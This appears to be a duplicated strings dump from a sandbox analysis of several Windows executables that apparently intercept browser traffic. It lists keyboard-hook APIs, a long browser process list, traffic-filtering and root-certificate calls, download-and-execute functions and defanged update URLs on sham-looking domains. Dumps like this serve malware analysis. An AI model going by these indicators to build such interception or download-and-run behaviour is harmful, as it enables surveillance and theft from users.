%s (%s)
imm32.dll
imm32.dll
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview
KeyPreview
WindowState
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
Password
Password
OnExecutepWE
OnExecutepWE
127.0.0.1
127.0.0.1
255.0.0.0
255.0.0.0
ServiceExecute
ServiceExecute
\G_CheckUpdate.txt
\G_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
NOVA UPDATE DISPONIVEL! URL:
\gs_update.exe
\gs_update.exe
hXXp://VVV.gosaferllc.com/services/rules.txt?dummy=
hXXp://VVV.gosaferllc.com/services/rules.txt?dummy=
hXXp://VVV.gosaferllc.com/services/update.php?v=
hXXp://VVV.gosaferllc.com/services/update.php?v=
&key=
&key=
\G_RuleList.txt
\G_RuleList.txt
[E] ProductKey :
[E] ProductKey :
[N] ProductKey :
[N] ProductKey :
cmd.exe /c net start GOSafer
cmd.exe /c net start GOSafer
cmd.exe /c net stop GOSafer
cmd.exe /c net stop GOSafer
c:\log.log
c:\log.log
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
ReportEventA
ReportEventA
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
WinExec
WinExec
GetCPInfo
GetCPInfo
version.dll
version.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
wsock32.dll
wsock32.dll
nfapi.dll
nfapi.dll
nf_tcpDisableFiltering
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_setTCPTimeout
nf_tcpClose
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpPostSend
nf_tcpSetConnectionState
nf_tcpSetConnectionState
psapi.dll
psapi.dll
ProtocolFilters.dll
ProtocolFilters.dll
5l6O6W6
5l6O6W6
?!?%?)?-?1?5?9?=?
?!?%?)?-?1?5?9?=?
5%6x6
5%6x6
1 1$1(1,1014181
1 1$1(1,1014181
0&0.080=0
0&0.080=0
2%3)3-31383
2%3)3-31383
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
1#1'1 1/13171;1
=!=,=7=?=_=
=!=,=7=?=_=
5 5$5(5,505
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3
3 3$3(3,3034383
3 3$3(3,3034383
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
3333333
3333333
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
KWindows
KWindows
UrlMon
UrlMon
OnExecute
OnExecute
No help keyword specified.
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Service failed on %s: %s
Unsupported clipboard format
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
!'%s' is not a valid integer value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
ActSys.exe_3756:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
EInvalidGraphicOperation
EInvalidGraphicOperation
UhWEB
UhWEB
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
Proportional
Proportional
MAPI32.DLL
MAPI32.DLL
TURLAction
TURLAction
HelpKeyword
HelpKeyword
TURLDownloadStatus
TURLDownloadStatus
dsBeginSyncOperation
dsBeginSyncOperation
dsEndSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
dsFilterReportMIMEType
TDownLoadURL
TDownLoadURL
URLMON.DLL
URLMON.DLL
URLDownloadToFileA
URLDownloadToFileA
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeyword
HelpKeyword
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreviewx4D
KeyPreviewx4D
WindowState
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
Password
Password
OnExecute
OnExecute
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
chrome.exe
chrome.exe
safari.exe
safari.exe
opera.exe
opera.exe
netscape.exe
netscape.exe
torch.exe
torch.exe
seamonkey.exe
seamonkey.exe
k-meleon.exe
k-meleon.exe
konqueror.exe
konqueror.exe
maxthon.exe
maxthon.exe
flock.exe
flock.exe
lunascape.exe
lunascape.exe
amaya.exe
amaya.exe
midori.exe
midori.exe
kidzui.exe
kidzui.exe
rockmelt.exe
rockmelt.exe
sbrowser.exe
sbrowser.exe
slimbrowser.exe
slimbrowser.exe
kidrocket.exe
kidrocket.exe
epic.exe
epic.exe
ironbrowser.exe
ironbrowser.exe
comodo.exe
comodo.exe
comododragon.exe
comododragon.exe
crazybrowser.exe
crazybrowser.exe
arora.exe
arora.exe
shenzbrowser.exe
shenzbrowser.exe
enigmabrowser.exe
enigmabrowser.exe
avant.exe
avant.exe
avantbrowser.exe
avantbrowser.exe
orca.exe
orca.exe
xbbrowser.exe
xbbrowser.exe
xbrowser.exe
xbrowser.exe
sleipnir.exe
sleipnir.exe
spacetime.exe
spacetime.exe
3dbrowse.exe
3dbrowse.exe
bitty.exe
bitty.exe
java.exe
java.exe
grail.exe
grail.exe
lynx.exe
lynx.exe
twb.exe
twb.exe
tt.exe
tt.exe
pinkbrowser.exe
pinkbrowser.exe
nuke.exe
nuke.exe
acoo.exe
acoo.exe
palemoon.exe
palemoon.exe
slimboat.exe
slimboat.exe
dooble.exe
dooble.exe
menubox.exe
menubox.exe
chromium.exe
chromium.exe
ultrabrowser.exe
ultrabrowser.exe
zac.exe
zac.exe
kylo.exe
kylo.exe
morequick.exe
morequick.exe
wyzo.exe
wyzo.exe
xombrero.exe
xombrero.exe
qupzilla.exe
qupzilla.exe
cometbird.exe
cometbird.exe
qtweb.exe
qtweb.exe
deepnet.exe
deepnet.exe
xtravo.exe
xtravo.exe
smartbro.exe
smartbro.exe
jumpto.exe
jumpto.exe
weblock4kids.exe
weblock4kids.exe
weblock.exe
weblock.exe
comodoice.exe
comodoice.exe
srwareiron.exe
srwareiron.exe
srware.exe
srware.exe
coolnovo.exe
coolnovo.exe
cool.exe
cool.exe
qup.exe
qup.exe
browseme.exe
browseme.exe
swiftfox.exe
swiftfox.exe
omniweb.exe
omniweb.exe
omni.exe
omni.exe
spark.exe
spark.exe
bobrowser.exe
bobrowser.exe
crossbrowser.exe
crossbrowser.exe
crossbrowse.exe
crossbrowse.exe
content-security-policy-report-only
content-security-policy-report-only
127.0.0.1
127.0.0.1
255.0.0.0
255.0.0.0
ServiceExecute
ServiceExecute
\P_CheckUpdate.txt
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
NOVA UPDATE DISPONIVEL! URL:
\nj_update.exe
\nj_update.exe
hXXp://VVV.ninjasoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.ninjasoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.ninjasoftwarellc.com/services/update.php?v=
hXXp://VVV.ninjasoftwarellc.com/services/update.php?v=
&key=
&key=
\P_RuleList.txt
\P_RuleList.txt
[E] ProductKey :
[E] ProductKey :
[N] ProductKey :
[N] ProductKey :
cmd.exe /c net start ActSys
cmd.exe /c net start ActSys
cmd.exe /c net stop ActSys
cmd.exe /c net stop ActSys
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
ReportEventA
ReportEventA
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
WinExec
WinExec
GetCPInfo
GetCPInfo
version.dll
version.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
wsock32.dll
wsock32.dll
nfapi.dll
nfapi.dll
nf_tcpDisableFiltering
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_setTCPTimeout
nf_tcpClose
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpPostSend
nf_tcpSetConnectionState
nf_tcpSetConnectionState
psapi.dll
psapi.dll
ProtocolFilters.dll
ProtocolFilters.dll
pfc_setRootSSLCertSubject
pfc_setRootSSLCertSubject
5l6O6W6
5l6O6W6
3?3
3?3
:!:%:6:>:
:!:%:6:>:
;$
;$
: :$:(:,:
: :$:(:,:
5-55595P5u5}5
5-55595P5u5}5
3 3$3(3,3034383
3 3$3(3,3034383
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
3333333
3333333
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
KWindows
KWindows
UrlMon
UrlMon
OnExecute
OnExecute
No help keyword specified.
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Service failed on %s: %s
Unsupported clipboard format
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
!'%s' is not a valid integer value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
DesProtetor.exe_4032:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
EInvalidGraphicOperation
EInvalidGraphicOperation
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
Proportional
Proportional
MAPI32.DLL
MAPI32.DLL
TURLAction
TURLAction
HelpKeywordp
HelpKeywordp
TURLDownloadStatus
TURLDownloadStatus
dsBeginSyncOperation
dsBeginSyncOperation
dsEndSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
dsFilterReportMIMEType
TDownLoadURL
TDownLoadURL
URLMON.DLL
URLMON.DLL
URLDownloadToFileA
URLDownloadToFileA
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeywordT
HelpKeywordT
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview
KeyPreview
WindowState
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
Password
Password
OnExecutepWE
OnExecutepWE
127.0.0.1
127.0.0.1
255.0.0.0
255.0.0.0
ServiceExecute
ServiceExecute
\P_CheckUpdate.txt
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
NOVA UPDATE DISPONIVEL! URL:
\po_update.exe
\po_update.exe
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
&key=
&key=
\P_RuleList.txt
\P_RuleList.txt
[E] ProductKey :
[E] ProductKey :
[N] ProductKey :
[N] ProductKey :
cmd.exe /c net start SaveSys
cmd.exe /c net start SaveSys
cmd.exe /c net stop SaveSys
cmd.exe /c net stop SaveSys
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
ReportEventA
ReportEventA
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
WinExec
WinExec
GetCPInfo
GetCPInfo
version.dll
version.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
wsock32.dll
wsock32.dll
nfapi.dll
nfapi.dll
nf_tcpDisableFiltering
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_setTCPTimeout
nf_tcpClose
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpPostSend
nf_tcpSetConnectionState
nf_tcpSetConnectionState
psapi.dll
psapi.dll
ProtocolFilters.dll
ProtocolFilters.dll
5l6O6W6
5l6O6W6
?!?%?)?-?1?5?9?=?
?!?%?)?-?1?5?9?=?
5%6x6
5%6x6
1 1$1(1,1014181
1 1$1(1,1014181
0&0.080=0
0&0.080=0
2%3)3-31383
2%3)3-31383
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
1#1'1 1/13171;1
=!=,=7=?=_=
=!=,=7=?=_=
5 5$5(5,505
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3
3 3$3(3,3034383
3 3$3(3,3034383
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
3333333
3333333
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
A.mi*#9$
A.mi*#9$
KWindows
KWindows
UrlMon
UrlMon
OnExecute
OnExecute
No help keyword specified.
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Service failed on %s: %s
Unsupported clipboard format
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
!'%s' is not a valid integer value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
ProtectWindowsManager.exe_3736:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
j.Yf;
j.Yf;
_tcPVj@
_tcPVj@
.PjRW
.PjRW
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
SHELL32.dll
SHELL32.dll
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
GetProcessWindowStation
GetProcessWindowStation
operator
operator
SHLWAPI.dll
SHLWAPI.dll
%dYeArdMoNthdDaY
%dYeArdMoNthdDaY
URLDownloadToFileA
URLDownloadToFileA
file_url
file_url
ShellExecuteExW
ShellExecuteExW
SHDeleteKeyW
SHDeleteKeyW
GetWindowsDirectoryA
GetWindowsDirectoryA
GetProcessHeap
GetProcessHeap
GetSystemWindowsDirectoryW
GetSystemWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCreateKeyExW
RegCreateKeyExW
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyW
RegCreateKeyW
ReportEventW
ReportEventW
ADVAPI32.dll
ADVAPI32.dll
PSAPI.DLL
PSAPI.DLL
USERENV.dll
USERENV.dll
VERSION.dll
VERSION.dll
GetCPInfo
GetCPInfo
zcÁ
zcÁ
263f3k3z3
263f3k3z3
=>>_> ?`?}?
=>>_> ?`?}?
5 5$5(5,5
5 5$5(5,5
? ?$?(?,?0?4?8?
? ?$?(?,?0?4?8?
:$:,:8:\:|:
:$:,:8:\:|:
%s_%s
%s_%s
\\.\Phys
\\.\Phys
..\Src\json\src\json_value.cpp
..\Src\json\src\json_value.cpp
..\Src\json\src\json_reader.cpp
..\Src\json\src\json_reader.cpp
xxxx
xxxx
..\Src\json\src\json_writer.cpp
..\Src\json\src\json_writer.cpp
kernel32.dll
kernel32.dll
mscoree.dll
mscoree.dll
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- floating point support not loaded
